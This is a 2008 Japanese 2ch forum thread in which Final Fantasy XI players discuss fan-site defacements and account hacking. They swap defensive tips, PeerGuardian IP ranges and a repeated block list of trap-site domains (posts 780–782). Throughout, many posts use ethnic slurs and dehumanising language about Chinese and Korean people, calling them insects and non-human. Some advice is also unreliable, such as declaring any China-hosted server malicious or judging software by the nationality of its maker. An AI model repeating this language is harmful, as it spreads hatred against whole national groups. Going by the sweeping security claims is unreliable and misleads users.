746 :既にその名前は使われています:2008/04/29(火) 18:48:26.53 ID:30gyeEqb
>>743
流石にそれは無いと思うが、完全に目をつけられてるからな
暫くは閉じておいた方が良い気もする

noscriptでニコニコは許可してるけど、ここやられたらしゃれにならんなーw

747 :既にその名前は使われています:2008/04/29(火) 18:48:38.97 ID:Be5UgwzC
>>666
そこが一番わかりやすいな

748 :既にその名前は使われています:2008/04/29(火) 18:55:12.34 ID:6tHp5lDN
>>734
えーっとねそれね、発見された場所が専ブラのログフォルダ内だったら無問題。
ただのコピペに過剰反応してるだけ。
例えばTemporary Internet Filesとか普通のブラウザで使うところで見つかったら問題だけど。


749 :既にその名前は使われています:2008/04/29(火) 18:55:58.36 ID:Cv/7UZoN
GW中はFF関連のHPを見るのをやめておこう・・・
ソロが多いから、ヴァナモンはFFやりながら良く見てたのにな・・・
ほんと、シナ畜死ね。なんでこんな国でオリンピックなんてするんだか('A`)

750 :ヴァナm ◆ZrzGMHfgII :2008/04/29(火) 18:57:03.74 ID:usez71CN
>>740
すごく面倒な上に数週間かかるらしい
ブログの有害指定解除しようと試みたが断念した

>>743
してねーよ、シナどもは滅びたほうが平和になると思ってるし
昨日のTVタックルで糞シナ女見てて俺の怒りが有頂天

751 :既にその名前は使われています:2008/04/29(火) 19:00:56.17 ID:xoxNwdCD
NoScript落とすサイトってここでいいの?
https://addons.mozilla.org/ja/firefox/addon/722https://addons.mozilla.org/ja/firefox/addon/722
本家だと寄付が必要みたいなんだけど

752 :既にその名前は使われています:2008/04/29(火) 19:01:11.47 ID:ge43d9r/
ヴァナモンの中の人頑張るな
お疲れ様なんだぜ

753 :既にその名前は使われています:2008/04/29(火) 19:02:13.44 ID:tJSRB5j8
>>750
前の感染の時からあったヴァナモン煽りなので反応しないよふに。

754 :既にその名前は使われています:2008/04/29(火) 19:03:55.95 ID:l5v8YLXm
中国人によるハッキングが凄いって聞いてたけど身近のサイトで起こると実感できるなぁ・・・中の人乙であります

755 :既にその名前は使われています:2008/04/29(火) 19:04:21.54 ID:6tHp5lDN
>>751
ツール>アドオン>新しい機能拡張を入手
で出てくるのがそこだからいいんじゃないの?

756 :既にその名前は使われています:2008/04/29(火) 19:06:17.78 ID:VWuSM+12
ネ実も改ざんとかされないだろうな?w

757 :既にその名前は使われています:2008/04/29(火) 19:06:41.63 ID:8LbdNzye
>>754
中国からなら、何をやろうが捕まらないんだろうな
国自体が糞すぎる

758 :既にその名前は使われています:2008/04/29(火) 19:06:50.67 ID:hgSjkkgD
今後ますますひどくなりそうだの・・・
FF11に関係ないサイトでも手当たりしだい改竄されそうで怖いお

759 :既にその名前は使われています:2008/04/29(火) 19:06:58.81 ID:tJSRB5j8
>>751
直接落としてOK。

760 :既にその名前は使われています:2008/04/29(火) 19:07:12.68 ID:u3GPKzxb
PG2導入してみたんだけど、FFやってたらずっと履歴出るのね(当然だけど)
リネ資料室のところのリスト以外にブロックリストに入れておけばいいような物はありますか?

761 :既にその名前は使われています:2008/04/29(火) 19:07:59.93 ID:jWGCrvox
どこが変えられてたの?
昨日エリア別>ボヤのとこ見ちまったんだがやヴぁい?

762 :既にその名前は使われています:2008/04/29(火) 19:09:17.08 ID:UJN5Is7Y
一回でもRMTした奴は文句言うなよ

763 :既にその名前は使われています:2008/04/29(火) 19:09:56.02 ID:iZ/ZkXOg
うおあぶねえ。このスレ見てなかったらこれからまさに開くとこだったぜ

764 :既にその名前は使われています:2008/04/29(火) 19:10:20.80 ID:+GNBdofq
もう対処してあるから大丈夫なんじゃないの?w

765 :既にその名前は使われています:2008/04/29(火) 19:12:11.15 ID:gJEZDady
>>761
まさにそのエリア別の所w
俺も見ながらFFしてたぜwwwww
火狐、NoScript入れてるけど、一応パスを変えておいた

766 :既にその名前は使われています:2008/04/29(火) 19:12:59.04 ID:+U1q43Cf
ばなもんすごく助かってるよ〜
ありがとう〜

767 :既にその名前は使われています:2008/04/29(火) 19:13:51.33 ID:hgSjkkgD
まぁ中の国の人らは著作権とかもないからね
言っても無駄なんだろうな
でもあっちが他の国の人からやられたら国を挙げて怒るのにな

今年はオリンピックもあるし
少しは中国に対して各国のみかたがかわって

768 :既にその名前は使われています:2008/04/29(火) 19:14:48.13 ID:/EwYiIz/
まだ早いと思うけど時間的にスレ消費早くなるだろうから
次スレのことも考えたまとめみたいなこと出来るといいな。

書き込み規制されてるので専用ブラウザから無理矢理かきこ

769 :既にその名前は使われています:2008/04/29(火) 19:15:15.17 ID:jWGCrvox
>>765
まじか…やっべ
パス変えるか

770 :既にその名前は使われています:2008/04/29(火) 19:25:53.88 ID:unY3VG/U
>725
今はそれで大丈夫だな。
狐さんユーザが増えたらそっちが攻撃対象になるだろう。


771 :既にその名前は使われています:2008/04/29(火) 19:26:31.97 ID:QB3mhR2y
情報弱者多すぎだろ!!!

怖い奴はここで質問する前に、回線ぶち抜いてスレを1から全部読め!!!!!

回答が来るまでセキュリティザルのままボーっとするのがいいのか!?!?

772 :既にその名前は使われています:2008/04/29(火) 19:30:10.38 ID:6tHp5lDN
>>760
念のために香港あたりもあってもいいんじゃないか?
リストは
【韓国 中国大好き】PeerGuardian 24【YBB大好き】
ttp://tmp7.2ch.net/test/read.cgi/download/1208186653/1-14
あたり参考で

773 :既にその名前は使われています:2008/04/29(火) 19:33:07.52 ID:Lb8L49wS
「侍」でググって画像検索かけると
侍AF2ダブルドロップってFFの画像と一緒に出てくるサイトって安全ですか?

aguseってサイトでurl入れて調べてみても
どう表示されたら危険なのかがわからねー><

774 :既にその名前は使われています:2008/04/29(火) 19:33:20.74 ID:+GNBdofq
香港って中国のリストじゃ弾けにぃのか。

775 :既にその名前は使われています:2008/04/29(火) 19:33:23.83 ID:15O5I2YY
>>769
スクエニはあまり細かい所に言及していないけれど垢ハック時に
こまめにセキュアなパスに変更していたか?ッてのも保証を得られるかどうかに
関わってくる事もあると思うのでこの機に変えてしまうのも良いと思います。

776 :既にその名前は使われています:2008/04/29(火) 19:33:46.45 ID:xe3ceo6d
民主は作らなさそうだが
自民がネット法で中国(外国)からのネット犯罪裁けるようにしてくれんかね。

777 :既にその名前は使われています:2008/04/29(火) 19:34:14.32 ID:Lb8L49wS
微妙に誤爆かも(つ∀-)

778 :既にその名前は使われています:2008/04/29(火) 19:35:16.36 ID:N60JP7rS
kingosoftのスキャンとファイアウォールあればおk?
これも無料だけど話題に出てないから心配になってきた

779 :既にその名前は使われています:2008/04/29(火) 19:35:50.23 ID:KA50Ku9I
>>771

もうこれテンプレ入りでいいぜwwwwwww

780 :既にその名前は使われています:2008/04/29(火) 19:39:28.43 ID:/EwYiIz/
playonline.com
playonlanei.com
maplestorfy.com
homepagenir.com
moguiceshigong.vicp.net
netbenrit.com
mediamax.com
upfordown.com
u.hmhk.org
ads.custom-click.com
windower.net/
n008/FFXi/ 
read.cgi/game/23181/
uploader/20/so/He_
mix.web.infoseek.co.jp/uploader/
axfc.net/uploader/20/so/He_
.rar
ff11art.blog.drecom.jp/
昔ネ実で見つけた罠サイトのURL一覧の一部を張っておきます。
NGワードとして使ってたものなので完全ではないですがURLブロック設定で参考になれば

781 :既にその名前は使われています:2008/04/29(火) 19:40:45.78 ID:/EwYiIz/
playonline.com
playonlanei.com
maplestorfy.com
homepagenir.com
moguiceshigong.vicp.net
netbenrit.com
mediamax.com
upfordown.com
u.hmhk.org
ads.custom-click.com
windower.net/
n008/FFXi/ 
read.cgi/game/23181/
uploader/20/so/He_
mix.web.infoseek.co.jp/uploader/
axfc.net/uploader/20/so/He_
.rar
ff11art.blog.drecom.jp/
昔ネ実で見つけた罠サイトのURL一覧の一部を張っておきます。
NGワードとして使ってたものなので完全ではないですがURLブロック設定で参考になれば

782 :既にその名前は使われています:2008/04/29(火) 19:41:16.27 ID:wQ5uMnV3
playonline.com
playonlanei.com
maplestorfy.com
homepagenir.com
moguiceshigong.vicp.net
netbenrit.com
mediamax.com
upfordown.com
u.hmhk.org
ads.custom-click.com
windower.net/
n008/FFXi/ 
read.cgi/game/23181/
uploader/20/so/He_
mix.web.infoseek.co.jp/uploader/
axfc.net/uploader/20/so/He_
.rar
ff11art.blog.drecom.jp/
昔ネ実で見つけた罠サイトのURL一覧の一部を張っておきます。
NGワードとして使ってたものなので完全ではないですがURLブロック設定で参考になれば

783 :既にその名前は使われています:2008/04/29(火) 19:42:46.54 ID:/EwYiIz/
ごめん、書き込み失敗したと思って2回押してしまった!
NGワードに入りまくってるから表示されないんだったwwwwwwww

784 :既にその名前は使われています:2008/04/29(火) 19:44:19.26 ID:iOHv4cxI
>>778
これこれやっとけば絶対安全、なんてのはない

785 :既にその名前は使われています:2008/04/29(火) 19:45:13.34 ID:iHnOoytQ
//

↑NGワードまじおすすめ

786 :既にその名前は使われています:2008/04/29(火) 19:45:44.51 ID:infg+3MU
パソコンを窓から投げ捨てる
のが一番手っ取り早いな。

787 :既にその名前は使われています:2008/04/29(火) 19:45:59.86 ID:+GNBdofq
>>785
そ、そんなことしないで(///)

788 :既にその名前は使われています:2008/04/29(火) 19:47:30.02 ID:dGWRi6Vr
>>773
aguseはサイトの本拠地(サーバ置いてる国)を調べ上げる所なので、
そのサイトが危険かどうかのチェックに関しては
あくまでもオマケ程度にしかやってない。

目安としては違法サイトの取締りが厳しい国や地域が発信源なら
多少危険度は下がる。もっとも法の目を潜り抜けて悪さしてる
サイトなんかいっぱいあるがな。

全世界に存在するウイルスの半分近くが中国産とのデータを
アメリカが出したこともあるので、サーバの位置が中国だったら
まず黒だと思っていい。ロシア、中南米辺りも結構ヤバイ。

789 :スレ分類厨:2008/04/29(火) 19:49:43.33 ID:r50PRflj
■社会問題目 垢ハック科

790 :既にその名前は使われています:2008/04/29(火) 19:51:28.93 ID:0FsK4unN
>>778
日頃の垢ハク対策はこのあたりが参考になると思う。

垢ハクスレのテンプレサイトにあるチェックリスト
ttp://miku.a.orn.jp/miku2/#c5
POLアカウントハックから身を守るための10箇条
ttp://mnk5.35kg.com/defense/

正直、kingsoftは勧めない。

791 :既にその名前は使われています:2008/04/29(火) 19:52:03.30 ID:Lb8L49wS
>>788
なるほどーありがとうー!

ちなみに調べたらラスベガスとかw

792 :既にその名前は使われています:2008/04/29(火) 19:52:07.14 ID:u3GPKzxb
>>772,780
ありがとう。参考にしてみます

793 :既にその名前は使われています:2008/04/29(火) 19:55:50.07 ID:dGWRi6Vr
>>791
fc2のサーバは全部ラスベガスだったはず。
とりあえずソース見てみたが、ブログそのものには問題なさそう。
この前fc2祭りがあった直後だから
一時的にfc2も警戒レベルを上げてるだろうし。
ただトラックバックには危険なスパムが一杯くっついてる。

794 :既にその名前は使われています:2008/04/29(火) 20:07:47.03 ID:hgSjkkgD
PG2インスコしてみたけど
>>662の奴だけだとFF11のログインサーバでつまるよね
219.117.156.21も追加せんと


795 :既にその名前は使われています:2008/04/29(火) 20:11:56.28 ID:1MR6asMf
spybotって起動するの糞遅いな

796 :既にその名前は使われています:2008/04/29(火) 20:12:27.71 ID:RFr+VlVl
HDD?がガリリいってこわい><

797 :既にその名前は使われています:2008/04/29(火) 20:13:52.39 ID:sWC59KVD
>>778
キングソフトが金山軟件有限公司って中国の会社なのは知ってるよな?
中国のウイルスには強いが日本のウイルスには弱いぞアレ

798 :既にその名前は使われています:2008/04/29(火) 20:15:04.10 ID:kLse6GM8
中国語版なんて販売してないし中国語サポートなんかやってないんだから
中国からの接続を遮断するぐらいやればいいのに何故やらない
本当に運営と業者はグルなのか??

アルテパゲートの側近NMで無限に生み出されるギルをGMが受け取ってるのは間違いないが

799 :ヴァナm ◆ZrzGMHfgII :2008/04/29(火) 20:15:21.26 ID:enKRPa5R
ルータ再起動したのでID変わってます
ちょっと聞きたいんだけど、獣wikiで改竄されてたってのは
編集不可能なページも改竄されてた?

800 :既にその名前は使われています:2008/04/29(火) 20:17:37.18 ID:gJSdmhMb
893とけーさつみたいなもんでしょ
業者とスクエニ
どれだけ要望あろうが言語別サーバーもうけないんだから
真っ黒ですよ

801 :既にその名前は使われています:2008/04/29(火) 20:18:11.94 ID:s0TS7VAB
>>798
わずかながら中国人の普通のプレイヤーと
中国に仕事なんかで出張している中国人ではないプレイヤーもわずかながら居るんだよ。
だいたい遮断した所で串通したり在日の業者にシフトしたりするのは目に見えてる。
リネでも中国からの接続を遮断したが状況はほぼ変わらず。

802 :既にその名前は使われています:2008/04/29(火) 20:18:19.60 ID:dGWRi6Vr
>>798
スクエニは中国法人持ってるので
表立って事を構えたくないというのが本音だろう。
バッシングが始まったら中国でシェア取れなくなっちまうからな。

この辺を変えたかったら
株主総会で中国展開の是非について発言すればいいんじゃない。

803 :既にその名前は使われています:2008/04/29(火) 20:20:50.23 ID:9QtiKkht
>>799
編集可能なページにしつこくリンク書き換えspamが来てただけなので、
今回のヴァナモンさんのケースとは全然別物と思われます


804 :既にその名前は使われています:2008/04/29(火) 20:21:27.60 ID:Z3l+N2CB
>>799
編集可能なページを普通の手順で書き換えただけ。
中の人が全ページ編集不可にしてから今日まで改竄はない模様。

805 :既にその名前は使われています:2008/04/29(火) 20:23:31.50 ID:x4+s6SoQ
管理人ガンバレ

806 :ヴァナm ◆ZrzGMHfgII :2008/04/29(火) 20:23:46.45 ID:enKRPa5R
>>803-804
そうなのか。xreaから移転したって話だったからさ

807 :既にその名前は使われています:2008/04/29(火) 20:24:22.56 ID:M8z0evIy
流れが速い読みにくい!

808 :既にその名前は使われています:2008/04/29(火) 20:26:37.40 ID:ptbqz9oM
>>202
>>730
直リンはやめよう
あとhは抜く


809 :既にその名前は使われています:2008/04/29(火) 20:27:51.60 ID:Z3l+N2CB
>>806
xreaではspamフィルタがうまく動かなかったので移転したらしい。
PHPでNSレコードを引けなかったんだな、きっと。

獣使いCHR+76
http://live27.2ch.net/test/read.cgi/ogame/1207787230/563
> 563 名前:既にその名前は使われています [sage] 投稿日:2008/04/22(火) 21:53:50.91 ID:EXGHYlsb
> >>553
> 手動で広告挿入するようにした方がよさそうですね
> ちょっと変更してみます
>
> スパム対策はspam_filter.phpでいくつかフィルタかけてみました
> 前のxreaだと何故かurlnsbl()とか上手くフィルタが動かなかったのですが、
> land.toではちゃんと動いてるっぽいです

810 :既にその名前は使われています:2008/04/29(火) 20:28:42.10 ID:qPI+v3qG
今回セキュリティとか何も知らない自称初心者だのオレみたいに始めたばっかりでウィルスとかスパムについて知らない奴はパス抜かれまくりってことでおk?
もう手はないんだろうか・・・

811 :既にその名前は使われています:2008/04/29(火) 20:30:53.07 ID:hgSjkkgD
今からでもなんとかなる
まずはパス変更


812 :既にその名前は使われています:2008/04/29(火) 20:31:13.25 ID:ptbqz9oM
>>774
リネ資料室の中国のリストは香港まで入ってます


813 :既にその名前は使われています:2008/04/29(火) 20:33:07.28 ID:QB3mhR2y
>>810
>>771見ろよ!君なら対策とれる!頑張れ!諦めるな!!

814 :既にその名前は使われています:2008/04/29(火) 20:33:17.74 ID:ptbqz9oM
>>778
まぁ何も入れないよりはいいと思うけど
ここのこの流れの話題でKingsoftだけはないと思う

個人的にはJwordとかも関係のところは入れる気がしない

815 :既にその名前は使われています:2008/04/29(火) 20:37:38.39 ID:Hcw3RWv2
ギルは日本人が買わなくても外人が買うから意味ねぇ
金策概念ないあつらがなんで日本人より良いHQ装備で固めてる奴多いんだ

816 :既にその名前は使われています:2008/04/29(火) 20:38:09.11 ID:P+JVKcFa
>>801
在日業者の垢ハックなら不正アクセス防止法で逮捕可能になるんだが?

817 :既にその名前は使われています:2008/04/29(火) 20:38:53.88 ID:w3co+Ud+
カスペルでvimc.exeってのがウィルス検地されたんだが・・
ググっても大した情報ないんだけどだれか分かる人いる?

818 :既にその名前は使われています:2008/04/29(火) 20:39:46.70 ID:/Z7+QTe2
PSOとモンハン2は中華業者につぶされたんだぞ
おかげで、日本ネトゲは衰退
どこまで邪魔なんだよ・・

819 :既にその名前は使われています:2008/04/29(火) 20:40:41.25 ID:6qQESGIG
>>817
ご愁傷様・・・

820 :既にその名前は使われています:2008/04/29(火) 20:40:44.64 ID:M8z0evIy
>>467
すげーなww
見てみたかった

821 :既にその名前は使われています:2008/04/29(火) 20:40:58.86 ID:q4MPS63x
>>818
そうなの?詳しく!

822 :既にその名前は使われています:2008/04/29(火) 20:42:02.01 ID:QB3mhR2y
http://spywarefiles.prevx.com/RRGDHH004118953/VIMC.EXE.html

823 :既にその名前は使われています:2008/04/29(火) 20:43:23.91 ID:wp2j1AaH
国産ネトゲどころか世界中に害悪を撒き散らしている
イナゴよりも性質の悪い毒蟲の類だな、あいつらは。
外見はヒトだが中身は別物。


824 :既にその名前は使われています:2008/04/29(火) 20:48:14.94 ID:AtT2amv0
タイリクヒトモドキとチョウセンヒトモドキは霊長類ですらないからな

825 :既にその名前は使われています:2008/04/29(火) 20:53:19.64 ID:w3co+Ud+
>>822
サンクス!

というか2ヶ月くらい前に見つけたやつなんだけど、未だに無事w
これって普通にファイル削除しただけでも大丈夫??

826 :既にその名前は使われています:2008/04/29(火) 20:56:23.33 ID:jp7obghG
金>>>越えられない壁>>>日本人

いい加減身に染みてるだろ

827 :既にその名前は使われています:2008/04/29(火) 20:57:47.15 ID:tJSRB5j8
キングソフトやソースネクストは裸とかわらん。

828 :既にその名前は使われています:2008/04/29(火) 20:57:58.62 ID:hgSjkkgD
人数だけでいえば世界一だからな


829 :既にその名前は使われています:2008/04/29(火) 21:01:04.56 ID:dGWRi6Vr
>>821
>おかげで、日本ネトゲは衰退

これは業者がどうこうよりも晒し文化のほうが問題じゃないの。
ニコニコのネトゲ動画全般見てみろ。ネタ動画は普通のコメが付くが
プレイ動画攻略動画となると途端に妬み・僻み・晒しコメの嵐だ。

830 :既にその名前は使われています:2008/04/29(火) 21:01:31.09 ID:ZusaBAHZ
支那畜対策age

831 :既にその名前は使われています:2008/04/29(火) 21:03:39.49 ID:ZusaBAHZ
支那畜対策age

832 :既にその名前は使われています:2008/04/29(火) 21:03:46.92 ID:ew0Q5C/A
チョンゲ水準で運営してりゃ客も遠のく

833 :既にその名前は使われています:2008/04/29(火) 21:06:13.29 ID:E/UXiNT5
あげとけよ

834 :既にその名前は使われています:2008/04/29(火) 21:08:43.24 ID:ZusaBAHZ
エラー出たのに二重になってる・・・

835 :778:2008/04/29(火) 21:20:18.58 ID:N60JP7rS
kingsoftがシナだなんて素で知らなかった・・・
速攻削除するわ。
ネ実はホントためになるなぁ。

836 :既にその名前は使われています:2008/04/29(火) 21:21:45.10 ID:hgSjkkgD
それほどでもない

837 :既にその名前は使われています:2008/04/29(火) 21:21:57.26 ID:tf3qI5Ww
>>778
金盾への分散コンピューティングによる協力に感謝します

838 :既にその名前は使われています:2008/04/29(火) 21:26:32.01 ID:3EbPlt+u
みんなで協力して運営にメールを送ろう。

買い手も厳しく処分しろと。

買い手がいる限り業者は何度処分されようが絶対消えない。
むしろ、稼ぎ役がこまめに処分されて稼ぎにくくなってるのに
ギルの需要があるからこそアカハックという強行手段に出つつあるとも言える。

つまり昨今のアカハックの責任はスクエニにもある。
今後も買い手を甘く処分し続ければますます業者の手口が
巧妙かつ強行になっていくかもしれない。RMT行為を徹底的につぶせ!


839 :既にその名前は使われています:2008/04/29(火) 21:34:21.14 ID:kdIvVy5s
キングソフトでも別に問題はない
というかどこも同じだろ

840 :既にその名前は使われています:2008/04/29(火) 21:36:22.93 ID:dGWRi6Vr
>>839
検知率が最低でも95%必要といわれるセキュリティソフトの世界で
検知率70%くらいなんだがw

841 :既にその名前は使われています:2008/04/29(火) 21:37:30.69 ID:Gl+aA549
>>838
運営じゃダメだぞ、国センなどの外部機関に訴えるか天安門の時のようにネット自体に広げないと無視される
「違反者を処罰していると発表されているが、掲示板などに違反者自らが処罰されていないことを示唆する文を書き込んでいる」
「処罰されたはずの違反者が本来サービスが行なわれていない地区から再入会を繰り返している」とか国センに送るのがいいかもな。

842 :既にその名前は使われています:2008/04/29(火) 21:43:37.81 ID:e0/x4mrA
>>835
あの胡散臭いポップの出し方見たら分かりそうなもんだがw

843 :既にその名前は使われています:2008/04/29(火) 21:47:50.34 ID:WOdDi+EO
次スレ勃ってた

http://live27.2ch.net/test/read.cgi/ogame/1209435760/

844 :既にその名前は使われています:2008/04/29(火) 21:53:39.53 ID:dM8OCm//
中国人自体を禁止にしろ

中国に出張でやりたいだ? しんでしまえ

IP経由もすべて取り締まれ。
どうしてもやりたければ、中国人専用鯖つくれ

845 :既にその名前は使われています:2008/04/29(火) 21:59:48.74 ID:1MR6asMf
中国IP全部弾いてくれれば
Uchino鯖のうざい有名台湾人も消えてくれて助かるわ・・

846 :既にその名前は使われています:2008/04/29(火) 22:00:39.22 ID:tJSRB5j8
>>835
同じ様なソフトを比較して調べるような癖つけておくといいかも。

847 :既にその名前は使われています:2008/04/29(火) 22:00:59.52 ID:jWGCrvox
Spy botとノートンでスキャンしてもなにも無かったんだけど、
一応パス変更しておいた。こんなもんで大丈夫?

848 :既にその名前は使われています:2008/04/29(火) 22:02:14.54 ID:U4251PCt
キングソフトは裸よりはマシかもな
糞ースネクストだけはダメゼッタイ!
セキュリティ0自体がウィルスよりたちわるい

849 :既にその名前は使われています:2008/04/29(火) 22:03:49.22 ID:0r4Vw+/b
対策ソフトとか重くなるから入れてないが、全く問題ない。

850 :既にその名前は使われています:2008/04/29(火) 22:04:19.73 ID:U4251PCt
あんまり、パス変更勧めるのもどうかと思うけどなあ
キーロガーだけ踏んでるって場合もあるから、裏目に出る可能性も無いとは言えない

851 :既にその名前は使われています:2008/04/29(火) 22:09:11.40 ID:tJSRB5j8
>>847
心配ならPG2入れておくとよろし。

852 :既にその名前は使われています:2008/04/29(火) 22:17:06.87 ID:jWGCrvox
>>851
おk。サンクス!!

853 :既にその名前は使われています:2008/04/29(火) 22:18:52.33 ID:vQDV6n9U
業者の罠が発覚したときだけこういうスレ見に来る人が多いけど
沈静化した後でもこの手のスレをチェックして情報収集するクセをつけたほうがいいな

854 :既にその名前は使われています:2008/04/29(火) 22:24:06.32 ID:0V0atqww
>>838
FF11のファンサイト利用規約で
RMTの広告を出さないようにさせればどうだろうか。

855 :既にその名前は使われています:2008/04/29(火) 22:25:40.27 ID:E/UXiNT5
あげあげ

856 :既にその名前は使われています:2008/04/29(火) 22:27:49.17 ID:dGWRi6Vr
>>854
ゲーム外の行動を規制しようとすると
サイト所在国の法律に沿って行動する必要が出てくるぞ。
RMT規制する法律は現在韓国くらいしかないので
現状ほとんどの国で規制は不可能。

857 :既にその名前は使われています:2008/04/29(火) 22:29:32.82 ID:0V0atqww
>>856
法的規制を求めるしかないのか。

福田内閣・・・orz

858 :既にその名前は使われています:2008/04/29(火) 22:29:46.52 ID:E/UXiNT5
注意喚起が目的のすれなのにさげて書くやつってなんなの?

しぬの?

859 :既にその名前は使われています:2008/04/29(火) 22:31:16.86 ID:Gl+aA549
>>856
サイトの利用規約の問題であって法で取り締まるわけじゃないから関係ねぇ
つーか複数国家にまたがるポータルは特定の宗教を前面に出すのを禁止してたりするしな

860 :既にその名前は使われています:2008/04/29(火) 22:31:18.33 ID:ptbqz9oM
専ブラの設定そのままなんじゃね?

861 :既にその名前は使われています:2008/04/29(火) 22:33:17.32 ID:tJSRB5j8
福田内閣うんぬんよりも、上にも書いたがん十年色んな海賊版を世界中から
バッシングあるのに放置してる国、そもそもやる気が無い。

862 :既にその名前は使われています:2008/04/29(火) 22:36:23.87 ID:ktjYJtZ6
俺、スレイプニル使ってるんだが、NoScriptってのは導入できないのか・・・
とりあえずセキュリティは一番高いのにしたが、火狐にしたほうがいいかな・・・

863 :既にその名前は使われています:2008/04/29(火) 22:36:58.36 ID:6aNOosh3
RMT広告意図的に放置してる大手サイトもありますからねえ

864 :-------------v---------:2008/04/29(火) 22:38:35.61 ID:E/UXiNT5
     |┃三        / ̄\
     |┃         |     |
     |┃          \_/
 ガラッ. |┃            |        
     |┃  ノ//   ./ ̄ ̄ ̄ \       
     |┃三    /  ::\:::/:::: \     ttp://www.vipper.org/vip790137.jpg
     |┃     /  <●>::::::<●>  \   
     |┃     |    (__人__)     |     
     |┃三   \    ` ⌒´    /      
     |┃三   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ \

865 :既にその名前は使われています:2008/04/29(火) 22:38:52.26 ID:dGWRi6Vr
>>859
言ってることがよく分からないのだが・・・
スクエニはRMT業者のサイトに何度もクレーム出してるが
法的拘束力がないクレームなので何の効果も挙げていない。

866 :既にその名前は使われています:2008/04/29(火) 22:42:28.26 ID:0V0atqww
>>865
RMTの業者に対する規制ではなくて
白地図本舗などの大手FFサイトに堂々とRMT広告が掲載されているのは
ファンサイトの利用規約で規制できるはずだが
やる気が無いのか法的根拠できないのか。

867 :既にその名前は使われています:2008/04/29(火) 22:46:06.25 ID:dGWRi6Vr
>>866
規制をかけられるとしたら公認ファンサイトだけでしょう。
ほとんどのサイトは非公認だからリアル法律違反じゃないと無理な気がする。

868 :既にその名前は使われています:2008/04/29(火) 22:47:22.20 ID:E/UXiNT5
       _
   /"' ̄フ/)         、
  ,/ ,--、  ̄、__フヽ     //
  ,ヘl⌒ノ   (^ω^)  ,/ /_  
 ( _l_"_ニ_ ⊂  ) /) / /
  ゛ ,>    (_ノフ、    、、>
   <" (      フ __>
   ヽ  \、、 _フ' ノ
    \、__、、,_ノ゛
         〉ニ〉ニ〉
       ,、_/ニ/ニ/
     ∠l∠l、ニ>

869 :既にその名前は使われています:2008/04/29(火) 22:48:11.81 ID:OclVA0S7
デフォルトブラウザがIEな時点で、全裸でイラクを歩く程度の危険度
ノートンとかバスタ入れてるから安全、と思う時点でシナチクの垢ハックトロイを歓迎している
検出率高い対策ソフト入れてるから平気、と高をくくった時点で垢ハック被害は運任せ


870 :既にその名前は使われています:2008/04/29(火) 22:50:07.94 ID:U4251PCt
エレメンって公認になるんか?
タナPとかと親交あるらしいが

871 :既にその名前は使われています:2008/04/29(火) 22:52:00.55 ID:dGWRi6Vr
>>870
この一覧表に載ってるところが公認ファンサイト。
http://www.playonline.com/polapps/s/fansite.site.List?polg_loc=ja&t=0

872 :既にその名前は使われています:2008/04/29(火) 22:57:21.22 ID:zxzZUaS8
>>869
こういう奴って、IEじゃないから俺は安心、と信じ切ってる気がするw

873 :既にその名前は使われています:2008/04/29(火) 23:04:47.03 ID:15O5I2YY
>>827
他にレノボとかある特定のタイミングで一斉にバックドア作るVer.upが来そうなんですね、分かります。

874 :既にその名前は使われています:2008/04/29(火) 23:17:31.09 ID:b74IGrbx
>>869
俺デフォで10年IE使い続けてるけど、ハック被害なんて受けた事ないぞ?


てか、受けても取られるような物なーーーーーんもないんだが?
なんだ?お前はパソコンにヤバイ物でも隠してるのか?

875 :既にその名前は使われています:2008/04/29(火) 23:18:12.75 ID:AtT2amv0
>>874
FFの垢ハックの話してるんじゃなかったのか

876 :既にその名前は使われています:2008/04/29(火) 23:23:35.21 ID:hgSjkkgD
今ってもうヴァナモンみても大丈夫だっけか?

877 :既にその名前は使われています:2008/04/29(火) 23:25:19.80 ID:vQDV6n9U
とりあえず大丈夫だが安心はできない

878 :既にその名前は使われています:2008/04/29(火) 23:38:12.38 ID:63lCFU83
>>866
白地図のとこ業者にサイト権利売ったんじゃない?
他に業者に売った所はFFrecipe。

879 :既にその名前は使われています:2008/04/29(火) 23:44:35.92 ID:8dHmli/6
つけっぱで寝てたらモニタいつも真っ黒のはずがなってなかった・・・

880 :既にその名前は使われています:2008/04/29(火) 23:45:44.70 ID:A4ZGhxHp
PG2導入後>>662追加でもFF出来ない!出来にくい!って言ってる人用。

(SQUARE-POL) SQUARE ENIX CO., LTD.:61.195.56.0-61.195.59.255
(SQUARE) SQUARE ENIX CO., LTD:202.67.48.0-202.67.63.255
(SQUARE-ENIX) SQUARE ENIX CO., LTD:219.117.144.0-219.117.159.255

他人が張ったIP許可怖い!信用できない!って人は下で調べてみてね。

ドメイン/IPアドレス【whois情報検索】
ttp://www.cman.jp/network/support/ip.html
IPドメインSEARCH
ttp://www.mse.co.jp/ip_domain/
IPひろば:メイン
ttp://www.iphiroba.jp/index.php

881 :既にその名前は使われています:2008/04/29(火) 23:55:48.66 ID:7E0B4ctm
お前らのおすすめアンチウィルスソフト何なのよ
何を使ってても何かしらの不平不満が出てるみたいなんだけど

882 :既にその名前は使われています:2008/04/29(火) 23:57:52.95 ID:tJSRB5j8
垢ハックスレのテンプレみれ。

883 :既にその名前は使われています:2008/04/29(火) 23:58:11.59 ID:ew0Q5C/A
>>881
良さそうな有名所1個
無料で使えるソフト2〜3個

884 :既にその名前は使われています:2008/04/29(火) 23:58:58.03 ID:vQDV6n9U
カスペ
検出率が高く、定義ファイルの更新も業界最速と評判
設定がめんどいので素人向きじゃない

ノートソ
カスペほど難しくない
でも新種ウィルスの対応遅い
業界ではそれなりの信用とシェアがある(らしい)

885 :既にその名前は使われています:2008/04/29(火) 23:59:11.89 ID:xe3ceo6d
HPのソースに天安門とかいろいろ書いたら
検閲に引っかからない!ふしぎ!
とかにはならない?

886 :既にその名前は使われています:2008/04/30(水) 00:02:46.78 ID:dGWRi6Vr
中国巨大検閲システム「金盾」についてWikipediaを見る限りでは
穴だらけであまり役に立ってないようだが。
所詮お役所仕事か・・・

887 :既にその名前は使われています:2008/04/30(水) 00:14:53.97 ID:ziARzf+1
>>780-782
遅レスだが、なんでplayonline.comまでNGワードにw
冗談で「パス抜かれた」とか言うレスがよくあるが、その弊害?
もちろん業者の攻撃対象としてみれば、公式が100%安全とは言わないけれど。

888 :既にその名前は使われています:2008/04/30(水) 00:20:47.20 ID:0TgUNvWp
緊急浮上

889 :既にその名前は使われています:2008/04/30(水) 00:29:14.08 ID:oWP1sri2
上に出てる対策一通りしてあとはパス変えるだけなんだけど
今回のって結局パス抜かれてるの?

一応やった対策一覧
Adware導入、全スキャン
Spy&bot導入、全スキャン
カスペルスキーオンラインスキャン
